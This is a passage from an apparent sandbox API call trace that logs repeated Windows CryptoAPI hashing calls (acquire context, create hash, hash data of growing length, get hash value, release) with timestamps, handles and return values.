	[0193.752] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.752] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303908
	[0193.752] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303908, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303908, pdwDataLen=0x1283b0) returned 1
	[0193.752] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.752] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.752] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.753] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.753] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0193.753] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.753] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303930
	[0193.753] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303930, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303930, pdwDataLen=0x1283b0) returned 1
	[0193.753] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.753] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.753] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.753] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.753] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0193.753] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.753] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303958
	[0193.753] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303958, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303958, pdwDataLen=0x1283b0) returned 1
	[0193.753] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.753] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.753] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.754] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.754] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0193.754] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.754] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303980
	[0193.754] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303980, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303980, pdwDataLen=0x1283b0) returned 1
	[0193.754] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.754] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.754] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.754] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.754] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0193.754] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.754] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23039a8
	[0193.754] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23039a8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23039a8, pdwDataLen=0x1283b0) returned 1
	[0193.754] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.754] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.754] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.755] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.755] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0193.755] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.755] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23039d0
	[0193.755] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x23039d0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23039d0, pdwDataLen=0x1283b0) returned 1
	[0193.755] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.755] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.755] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.755] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.755] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0193.755] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.755] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23039f8
	[0193.755] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x23039f8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x23039f8, pdwDataLen=0x1283b0) returned 1
	[0193.755] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.755] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.755] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.756] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.756] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0193.756] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.756] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303a20
	[0193.756] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303a20, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303a20, pdwDataLen=0x1283b0) returned 1
	[0193.756] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.756] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.756] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.756] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.756] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0193.756] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.756] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303a48
	[0193.756] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303a48, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303a48, pdwDataLen=0x1283b0) returned 1
	[0193.756] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.757] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.757] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.757] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.757] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0193.757] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.757] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303a70
	[0193.757] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303a70, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303a70, pdwDataLen=0x1283b0) returned 1
	[0193.757] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.757] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.757] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.757] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.757] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0193.757] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.758] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303a98
	[0193.758] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303a98, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303a98, pdwDataLen=0x1283b0) returned 1
	[0193.758] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.758] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.758] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.758] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.758] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0193.758] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.758] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303ac0
	[0193.758] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303ac0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303ac0, pdwDataLen=0x1283b0) returned 1
	[0193.758] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.758] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.758] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.759] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.759] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0193.759] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.759] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303ae8
	[0193.759] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303ae8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303ae8, pdwDataLen=0x1283b0) returned 1
	[0193.759] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.759] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.759] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.759] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.759] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0193.759] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.759] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303b10
	[0193.759] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303b10, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303b10, pdwDataLen=0x1283b0) returned 1
	[0193.759] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.759] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.759] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.760] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.760] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0193.760] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.760] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303b38
	[0193.760] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303b38, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303b38, pdwDataLen=0x1283b0) returned 1
	[0193.760] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.760] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.760] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.760] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.760] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0193.760] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.760] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303b60
	[0193.760] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303b60, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303b60, pdwDataLen=0x1283b0) returned 1
	[0193.760] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.760] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.760] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.761] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.761] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0193.761] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.761] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303b88
	[0193.761] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303b88, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303b88, pdwDataLen=0x1283b0) returned 1
	[0193.761] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.761] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.761] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.761] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.761] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0193.761] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.761] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303bb0
	[0193.761] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303bb0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303bb0, pdwDataLen=0x1283b0) returned 1
	[0193.761] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.761] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.761] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.762] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.762] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0193.762] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.762] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303bd8
	[0193.762] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303bd8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303bd8, pdwDataLen=0x1283b0) returned 1
	[0193.762] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.762] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.762] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.763] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.763] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0193.763] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.763] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303c00
	[0193.763] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303c00, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303c00, pdwDataLen=0x1283b0) returned 1
	[0193.763] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.763] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.763] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.763] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.764] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0193.764] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.764] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303c28
	[0193.764] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303c28, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303c28, pdwDataLen=0x1283b0) returned 1
	[0193.764] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.764] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.764] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.764] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.764] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0193.764] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.764] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303c50
	[0193.764] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303c50, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303c50, pdwDataLen=0x1283b0) returned 1
	[0193.764] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.764] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.764] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.765] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.765] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0193.765] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.765] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303c78
	[0193.765] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303c78, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303c78, pdwDataLen=0x1283b0) returned 1
	[0193.765] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.765] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.765] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.765] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.765] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x340, dwFlags=0x0) returned 1
	[0193.765] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.765] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303ca0
	[0193.765] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x2, pbData=0x2303ca0, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303ca0, pdwDataLen=0x1283b0) returned 1
	[0193.765] CryptDestroyHash (hHash=0x22b6900) returned 1
	[0193.765] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.765] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.766] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.766] CryptHashData (hHash=0x22b6940, pbData=0x2753bd8, dwDataLen=0x360, dwFlags=0x0) returned 1
	[0193.766] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
	[0193.766] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2303cc8
	[0193.766] CryptGetHashParam (in: hHash=0x22b6940, dwParam=0x2, pbData=0x2303cc8, pdwDataLen=0x1283b0, dwFlags=0x0 | out: pbData=0x2303cc8, pdwDataLen=0x1283b0) returned 1
	[0193.766] CryptDestroyHash (hHash=0x22b6940) returned 1
	[0193.766] CryptReleaseContext (hProv=0x225748, dwFlags=0x0) returned 1
	[0193.766] CryptAcquireContextW (in: phProv=0x1283b4, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1283b4*=0x225748) returned 1
	[0193.766] CryptCreateHash (in: hProv=0x225748, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x1283b8 | out: phHash=0x1283b8) returned 1
	[0193.766] CryptHashData (hHash=0x22b6900, pbData=0x2753bd8, dwDataLen=0x380, dwFlags=0x0) returned 1
	[0193.766] CryptGetHashParam (in: hHash=0x22b6900, dwParam=0x4, pbData=0x1283b0, pdwDataLen=0x1283ac, dwFlags=0x0 | out: pbData=0x1283b0, pdwDataLen=0x1283ac) returned 1
